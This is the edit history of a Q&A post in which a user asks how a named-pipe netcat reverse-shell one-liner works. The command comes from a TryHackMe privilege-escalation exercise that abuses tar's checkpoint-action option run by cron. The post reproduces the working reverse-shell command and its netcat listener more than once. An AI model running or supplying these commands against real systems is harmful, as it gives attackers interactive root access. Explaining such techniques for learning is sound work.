Communities

Writing
Writing
Codidact Meta
Codidact Meta
The Great Outdoors
The Great Outdoors
Photography & Video
Photography & Video
Scientific Speculation
Scientific Speculation
Cooking
Cooking
Electrical Engineering
Electrical Engineering
Judaism
Judaism
Languages & Linguistics
Languages & Linguistics
Software Development
Software Development
Mathematics
Mathematics
Christianity
Christianity
Code Golf
Code Golf
Music
Music
Physics
Physics
Linux Systems
Linux Systems
Power Users
Power Users
Tabletop RPGs
Tabletop RPGs
Community Proposals
Community Proposals
tag:snake search within a tag
answers:0 unanswered questions
user:xxxx search by author id
score:0.5 posts with 0.5+ score
"snake oil" exact phrase
votes:4 posts with 4+ votes
created:<1w created < 1 week ago
post_type:xxxx type of post
Search help
Notifications
Mark all as read See all your notifications »
Users Search
Help Dashboard Sign In Sign Up
Q&A Meta
Q&A
Posts Tags Edits
Ask Question

Post History

77%
+5 −0
Q&A Reverse shell with named pipe and netcat

This blog post describes a privilege escalation, exploiting tar's --checkpoint-action option. The privilege escalation is used to solve a TryHackMe challenge. The root user calls tar via cron whi...

1 answer  ·  posted 3y ago by Matthias Braun‭  ·  last activity 1y ago by Kamil Maciorowski‭

Question shell networking
#2: Post edited by user avatar Matthias Braun‭ · 2021-08-31T19:20:08Z (about 3 years ago)
fix post
  • [This blog post] describes a privilege escalation, exploiting `tar`'s `--checkpoint-action` option. The privilege escalation is used to solve a [TryHackMe](https://www.tryhackme.com/) challenge.
  • The root user calls `tar` via `cron` which causes a script with the following content to run (I adapted the script a bit):
  • rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
  • I'm trying to wrap my head around the interaction between `cat`, `sh`, netcat, and the named pipe `/tmp/f`.
  • Here's my literal reading of the command:
  • 1. Create a new named pipe at `/tmp/f`.
  • 2. Write the contents of `/tmp/f` to an interactive shell.
  • 3. Write the output of the shell to netcat.
  • 4. The output of netcat is written to the named pipe `/tmp/f`.
  • After running the command and creating a listening netcat server locally with `nc -lvnp 4445` I indeed got root access.
  • I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.
  • [This blog post](https://blog.gregscharf.com/2021/03/22/tar-in-cronjob-to-privilege-escalation/) describes a privilege escalation, exploiting `tar`'s `--checkpoint-action` option. The privilege escalation is used to solve a [TryHackMe](https://www.tryhackme.com/) challenge.
  • The root user calls `tar` via `cron` which causes a script with the following content to run (I adapted the script a bit):
  • rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f
  • I'm trying to wrap my head around the interaction between `cat`, `sh`, netcat, and the named pipe `/tmp/f`.
  • Here's my literal reading of the command:
  • 1. Create a new named pipe at `/tmp/f`.
  • 2. Write the contents of `/tmp/f` to an interactive shell.
  • 3. Write the output of the shell to netcat.
  • 4. The output of netcat is written to the named pipe `/tmp/f`.
  • After running the command and creating a listening netcat server locally with `nc -lvnp 4445` I indeed got root access.
  • I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.
#1: Initial revision by user avatar Matthias Braun‭ · 2021-08-31T19:19:30Z (about 3 years ago) 
Reverse shell with named pipe and netcat
[This blog post] describes a privilege escalation, exploiting `tar`'s `--checkpoint-action` option. The privilege escalation is used to solve a  [TryHackMe](https://www.tryhackme.com/) challenge.

The root user calls `tar` via `cron` which causes a script with the following content to run (I adapted the script a bit):

    rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 > /tmp/f

I'm trying to wrap my head around the interaction between `cat`, `sh`, netcat, and the named pipe `/tmp/f`.

Here's my literal reading of the command:

  1. Create a new named pipe at `/tmp/f`.
  2. Write the contents of `/tmp/f` to an interactive shell.
  3. Write the output of the shell to netcat.
  4. The output of netcat is written to the named pipe `/tmp/f`.

After running the command and creating a listening netcat server locally with `nc -lvnp 4445` I indeed got root access.

I have a rough intuition that the steps above create an input/output loop between netcat and the shell but I'd love to deepen my knowledge on how this works.
shell networking